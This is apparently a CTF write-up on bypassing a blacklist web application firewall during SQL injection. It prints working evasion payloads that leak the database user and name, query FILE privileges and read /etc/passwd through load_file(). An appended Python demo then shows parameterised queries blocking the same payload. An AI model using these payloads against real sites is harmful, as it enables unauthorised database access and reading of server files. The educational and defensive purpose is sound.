SQL Injection / WAF Bypassing

Ishara Abeythissa
4 min read, Jul 28, 2019


Default Diagram of Web Application Communication

A WAF, or web application firewall, protects web servers by filtering and monitoring HTTP traffic for attack requests such as cross-site request forgery (CSRF), cross-site scripting (XSS), SQL injection and file inclusion, among others. It operates at layer 7 of the OSI model.

A WAF operates through a set of rules often called policies. These policies aim to protect against vulnerabilities in the application by filtering out malicious traffic. The value of a WAF comes in part from the speed and ease with which policy modification can be implemented, allowing for faster response to varying attack vectors; during a DDoS attack, rate limiting can be quickly implemented by modifying WAF policies.

What is the difference between blacklist and whitelist WAFs?

A WAF can be implemented in one of three different ways, each with its own benefits and shortcomings:

  • A network-based WAF is generally hardware-based. Since they are installed locally they minimize latency, but network-based WAFs are the most expensive option and also require the storage and maintenance of physical equipment.
  • A host-based WAF may be fully integrated into an application’s software. This solution is less expensive than a network-based WAF and offers more customizability. The downside of a host-based WAF is the consumption of local server resources, implementation complexity, and maintenance costs. These components typically require engineering time, and may be costly.
  • Cloud-based WAFs offer an affordable option that is very easy to implement; they usually offer a turnkey installation that is as simple as a change in DNS to redirect traffic. Cloud-based WAFs also have a minimal upfront cost, as users pay monthly or annually for security as a service. Cloud-based WAFs can also offer a solution that is consistently updated to protect against the newest threats without any additional work or cost on the user’s end. The drawback of a cloud-based WAF is that users hand over the responsibility to a third-party, therefore some features of the WAF may be a black box to them. Learn about Cloudflare’s cloud-based WAF solution.

Today's discussion is about a technique for bypassing a WAF during SQL injection, demonstrated on a CTF site.

A few days earlier I had joined a CTF challenge called OMEGA, run by Osanda Malith Jayathissa. After some research we found that the website used a WAF as its security mechanism, and we had to bypass it to go further.

First we went to the site's robots.txt file, where we found some directories. After going through them we found an interesting directory called /dev/, which is used to search members.

/dev/ DIR

We then tried to inject SQL queries there.

SQL Injection Detection

From this we figured out that some security mechanism was in use. To check further we tried some more SQL queries, but all of them were blacklisted by the WAF. So we created a custom payload (thanks to Osanda Malith Jayathissa) and bypassed the WAF with it:

damn'UnIUNIONon/**/sESELECTlect/**/1,2,user(),4&&1='1

Payload Worked! :)

Now we need to find the database name with database().

damn'UnIUNIONon/**/sESELECTlect/**/1,2,database(),4&&1='1

database(); :)

Going further, we looked up the privileges that had been granted to the default user of this database.

damn'UnIUNIONon/**/sESELECTlect/**/1,2,File_priv,4/**/from/**/mysql.user/**/where/**/user=user()||1='1

File Privileges :)

Now we tried to read the /etc/passwd file using this privilege.

damn'UnIUNIONon/**/sESELECTlect/**/1,2,load_file('/etc/passwd'),4||1='1

/etc/passwd :)
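The WAF was only a compensating control; the defect that made every step above possible is the /dev/ search concatenating user input into its SQL. The example below is added here and is not part of the original post: it rebuilds a member search in Python over an in-memory SQLite table with constructed rows, and runs the UNION payload through a concatenating version and a parameterised version. The probe is the page's payload as it looks after the weak filter has deleted the inner keywords, adapted to SQLite syntax (sqlite_version() in place of MySQL's user(), AND in place of &&); the table name and columns are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the CTF's member table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, name TEXT, email TEXT, role TEXT)")
    conn.executemany("INSERT INTO members VALUES (?,?,?,?)", [
        (1, "Ishara", "ishara@example.test", "member"),
        (2, "Osanda", "osanda@example.test", "admin"),
    ])
    return conn


# The write-up's UNION payload as it reaches the database once the weak WAF has
# deleted the inner keywords, adapted to SQLite for this demo: sqlite_version()
# stands in for MySQL's user(), AND for MySQL's &&.
PROBE = "damn' UNION SELECT 1,2,sqlite_version(),4 AND '1'='1"


def vulnerable_search(term: str) -> list:
    """String concatenation: the input becomes part of the SQL grammar, so a
    quote closes the literal and the rest is parsed as a second SELECT."""
    conn = make_db()
    sql = "SELECT id,name,email,role FROM members WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def safe_search(term: str) -> list:
    """Bound parameter: the whole input is compared as one value and can never
    alter the statement, whatever keywords or comments it contains."""
    conn = make_db()
    sql = "SELECT id,name,email,role FROM members WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


def expected_version() -> str:
    """What the injected sqlite_version() call will leak in the email column."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    print("concatenated :", vulnerable_search(PROBE))  # one row, version in column 3
    print("parameterised:", safe_search(PROBE))        # no member named like that
    print("normal lookup:", safe_search("Ishara"))
```

The same boundary covers the later steps in the write-up: with a bound parameter, neither the File_priv lookup against mysql.user nor load_file() ever becomes part of the statement. Independently of the query, the application's database account should not hold the FILE privilege at all; a search endpoint has no reason to read files off the server's disk.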
